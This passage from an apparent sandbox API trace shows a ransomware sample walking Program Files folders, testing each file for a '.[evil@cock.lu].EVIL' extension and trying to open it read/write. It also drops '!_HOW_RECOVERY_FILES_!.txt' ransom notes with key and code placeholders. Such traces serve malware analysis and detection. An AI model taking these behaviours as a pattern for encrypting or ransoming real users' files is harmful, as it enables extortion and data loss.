dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.527] GetLastError () returned 0x5 [0088.527] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.527] wcsstr (_Str="keypadbase.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.527] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 87 [0088.527] wcscmp (_String1="keypadbase.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.527] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="keypadbase.xml") returned 0x0 [0088.527] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 0x57 [0088.527] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.527] GetLastError () returned 0x5 [0088.527] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.527] wcsstr (_Str="kor-kor.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.527] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 84 [0088.527] wcscmp (_String1="kor-kor.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.527] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="kor-kor.xml") returned 0x0 [0088.527] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 0x54 [0088.527] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.528] GetLastError () returned 0x5 [0088.528] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.528] FindClose (in: hFindFile=0x84b11dd1a0 | out: hFindFile=0x84b11dd1a0) returned 1 [0088.528] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 0x48 [0088.528] strlen (_Str="${KEY}") returned 0x6 [0088.528] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.528] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.528] strlen (_Str="${CODE}") returned 0x7 [0088.528] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.528] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.528] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.528] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.528] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.528] __uncaught_exception () returned 0x84b1160800 [0088.528] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.529] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.530] wcsstr (_Str="keypad.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.530] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 76 [0088.530] wcscmp (_String1="keypad.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.530] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="keypad.xml") returned 0x0 [0088.530] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 0x4c [0088.530] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.530] GetLastError () returned 0x5 [0088.530] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.530] wcsstr (_Str="main", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.530] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 70 [0088.530] wcscmp (_String1=".", _String2="main") returned -1 [0088.530] wcscmp (_String1="..", _String2="main") returned -1 [0088.530] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 0x46 [0088.530] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 0x0 [0088.530] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*" [0088.530] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11dd0e0 [0088.541] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.541] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.") returned 72 [0088.541] wcscmp (_String1=".", _String2=".") returned 0 [0088.541] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.541] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.541] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\..") returned 73 [0088.541] wcscmp (_String1=".", _String2="..") returned -1 [0088.541] wcscmp (_String1="..", _String2="..") returned 0 [0088.541] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.541] wcsstr (_Str="base.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.541] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 79 [0088.541] wcscmp (_String1="base.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.541] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="base.xml") returned 0x0 [0088.541] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 0x4f [0088.541] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.541] GetLastError () returned 0x5 [0088.541] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.541] wcsstr (_Str="baseAltGr_rtl.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.541] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 88 [0088.541] wcscmp (_String1="baseAltGr_rtl.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.541] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="baseAltGr_rtl.xml") returned 0x0 [0088.541] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 0x58 [0088.541] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.542] GetLastError () returned 0x5 [0088.542] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.542] wcsstr (_Str="base_altgr.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.542] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 85 [0088.542] wcscmp (_String1="base_altgr.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.542] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="base_altgr.xml") returned 0x0 [0088.542] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 0x55 [0088.542] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.542] GetLastError () returned 0x5 [0088.542] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.542] wcsstr (_Str="base_ca.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.542] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 82 [0088.542] wcscmp (_String1="base_ca.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.542] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="base_ca.xml") returned 0x0 [0088.542] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 0x52 [0088.542] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.543] GetLastError () returned 0x5 [0088.543] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.543] wcsstr (_Str="base_heb.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.543] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 83 [0088.543] wcscmp (_String1="base_heb.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.543] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="base_heb.xml") returned 0x0 [0088.543] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 0x53 [0088.543] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.543] GetLastError () returned 0x5 [0088.543] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.543] wcsstr (_Str="base_jpn.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.543] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 83 [0088.543] wcscmp (_String1="base_jpn.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.543] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="base_jpn.xml") returned 0x0 [0088.543] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 0x53 [0088.543] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.543] GetLastError () returned 0x5 [0088.543] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.543] wcsstr (_Str="base_kor.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.543] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 83 [0088.543] wcscmp (_String1="base_kor.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.543] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="base_kor.xml") returned 0x0 [0088.543] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 0x53 [0088.543] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.544] GetLastError () returned 0x5 [0088.544] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.544] wcsstr (_Str="base_rtl.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.544] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 83 [0088.544] wcscmp (_String1="base_rtl.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.544] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="base_rtl.xml") returned 0x0 [0088.544] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 0x53 [0088.544] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.545] GetLastError () returned 0x5 [0088.545] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.545] wcsstr (_Str="ja-jp.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.545] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 80 [0088.545] wcscmp (_String1="ja-jp.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.545] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ja-jp.xml") returned 0x0 [0088.545] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 0x50 [0088.545] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.545] GetLastError () returned 0x5 [0088.545] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.545] wcsstr (_Str="ko-kr.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.545] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 80 [0088.545] wcscmp (_String1="ko-kr.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.545] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ko-kr.xml") returned 0x0 [0088.545] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 0x50 [0088.545] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.546] GetLastError () returned 0x5 [0088.546] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.546] wcsstr (_Str="zh-changjei.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.546] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 86 [0088.546] wcscmp (_String1="zh-changjei.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.546] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="zh-changjei.xml") returned 0x0 [0088.546] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 0x56 [0088.546] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.546] GetLastError () returned 0x5 [0088.546] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.546] wcsstr (_Str="zh-dayi.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.546] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 82 [0088.546] wcscmp (_String1="zh-dayi.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.546] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="zh-dayi.xml") returned 0x0 [0088.546] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 0x52 [0088.546] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.547] GetLastError () returned 0x5 [0088.547] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.547] wcsstr (_Str="zh-phonetic.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.547] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 86 [0088.547] wcscmp (_String1="zh-phonetic.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.547] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="zh-phonetic.xml") returned 0x0 [0088.547] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 0x56 [0088.547] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.547] GetLastError () returned 0x5 [0088.547] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.547] FindClose (in: hFindFile=0x84b11dd0e0 | out: hFindFile=0x84b11dd0e0) returned 1 [0088.547] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 0x46 [0088.547] strlen (_Str="${KEY}") returned 0x6 [0088.547] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.547] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.548] strlen (_Str="${CODE}") returned 0x7 [0088.548] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.548] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.548] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.548] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.549] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.549] __uncaught_exception () returned 0x84b1160800 [0088.549] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.550] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.550] wcsstr (_Str="main.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.550] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml") returned 74 [0088.550] wcscmp (_String1="main.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.550] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="main.xml") returned 0x0 [0088.550] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml") returned 0x4a [0088.550] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 